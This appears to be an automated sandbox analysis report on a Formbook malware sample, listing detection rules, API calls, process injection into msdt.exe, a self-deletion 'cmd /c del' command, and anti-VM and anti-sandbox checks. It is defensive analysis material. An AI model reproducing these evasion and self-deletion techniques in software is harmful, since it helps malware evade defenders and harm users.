      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_002769C9
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00276D30
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_002790C0
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_002790D0
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_0027A44B
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00DA67E7
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00DA0048
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00DA5C18
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00DA0012
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00F57447
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_002700F0
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00401030
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041BA85
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041C296
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041BBE0
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00408C6B
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00408C70
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041C40C
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041C4F7
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041C55C
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00402D90
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00402FB0
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0089E0C6
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008CD005
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008A3040
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008B905A
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0089E2E9
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00941238
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0089F3CF
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008C63DB
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008A2305
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008A7353
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008EA37B
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008B1489
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008D5485
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008BC5F0
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008A351F
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008A4680
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008AE6C1
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00942622
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00F57447
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02641238
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0259E2E9
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A7353
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025EA37B
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A2305
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025C63DB
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0259F3CF
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025B905A
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A3040
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025CD005
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0259E0C6
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02642622
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025AE6C1
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A4680
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025D57C3
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025AC7BC
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0262579A
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025B1489
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025D5485
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A351F
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025BC5F0
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02653A83
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025C7B00
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0259FBD7
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0262DBDA
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0264CBA4
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025AC85C
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025C286D
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0263F8EE
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02625955
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025B69FE
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A29B2
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0264098E
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025BEE4C
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025D2E2F
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025CDF7C
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025B0F3F
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025ACD5B
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025D0D3B
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0263FDDD
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 025E373B appears 238 times
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0260F970 appears 81 times
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0259DF5C appears 107 times
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0259E2A8 appears 38 times
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 025E3F92 appears 108 times
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: String function: 0089DF5C appears 50 times
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: String function: 008E3F92 appears 43 times
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: String function: 008E373B appears 81 times
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_004185D0 NtCreateFile,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00418680 NtReadFile,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00418700 NtClose,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_004187B0 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_004186FA NtClose,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_004187AA NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00890048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00890078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0088FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008910D0 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00890060 NtQuerySection,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008901D4 NtSetValueKey,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0089010C NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00891148 NtOpenThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025907AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02590048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02590078 NtResumeThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02590060 NtQuerySection,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025910D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02591148 NtOpenThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0259010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025901D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258F8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258F938 NtWriteFile,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02591930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02590C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0258FD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_02591D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_001185D0 NtCreateFile,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_00118680 NtReadFile,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_00118700 NtClose,
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_001187B0 NtAllocateVirtualMemory,
      Source: ejecutable1.exe, 00000000.00000002.406383630.0000000001016000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.405909286.00000000007A4000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406092250.0000000000C80000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.443196696.0000000001016000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000003.441170731.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.442687115.0000000000B00000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable1.exe
      Source: ejecutable1.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\ejecutable1.exe | Memory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exe | Memory allocated: 76E90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exe | Memory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exe | Memory allocated: 76E90000 page execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exe | Memory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exe | Memory allocated: 76E90000 page execute and read and write
      Source: ejecutable1.exe | Virustotal: Detection: 36%
      Source: ejecutable1.exe | ReversingLabs: Detection: 13%
      Source: ejecutable1.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ejecutable1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown | Process created: C:\Users\user\Desktop\ejecutable1.exe 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
      Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exe | File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/0@11/8
      Source: C:\Users\user\Desktop\ejecutable1.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\ejecutable1.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: ejecutable1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: ejecutable1.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
      Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

      Data Obfuscation:

      .NET source code contains potential unpacker
      Source: ejecutable1.exe, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_0027EC70 push eax; retn 0027h
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 0_2_00DA44FA push ds; iretd
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041B87C push eax; ret
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041B812 push eax; ret
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041B81B push eax; ret
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00415B53 push ds; ret
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00415B1A push ds; ret
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00415CE2 push 81CAEFA2h; retf
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00415F6D push ss; ret
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_0041B7C5 push eax; ret
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_0259DFA1 push ecx; ret
      Source: initial sample | Static PE information: section name: .text entropy: 6.99789102279

      Hooking and other Techniques for Hiding and Protection:

      Self deletion via cmd delete
      Source: C:\Windows\SysWOW64\msdt.exe | Process created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Windows\SysWOW64\msdt.exe | Process created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Deletes itself after installation
      Source: C:\Windows\SysWOW64\cmd.exe | File deleted: c:\users\user\desktop\ejecutable1.exe
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Yara detected AntiVM3
      Source: Yara match | File source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: ejecutable1.exe PID: 788, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\ejecutable1.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480 | Thread sleep time: -45730s >= -30000s
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1348 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2908 | Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_004088C0 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\ejecutable1.exe | Thread delayed: delay time: 45730
      Source: C:\Users\user\Desktop\ejecutable1.exe | Thread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000003.00000000.408183204.00000000002C7000.00000004.00000020.sdmp | Binary or memory string: @z.SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: vmware
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.463438478.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.408138486.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000003.00000000.413770462.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_004088C0 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4_2_025A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\ejecutable1.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\ejecutable1.exe | Code function: 2_2_00409B30 LdrLoadDll,
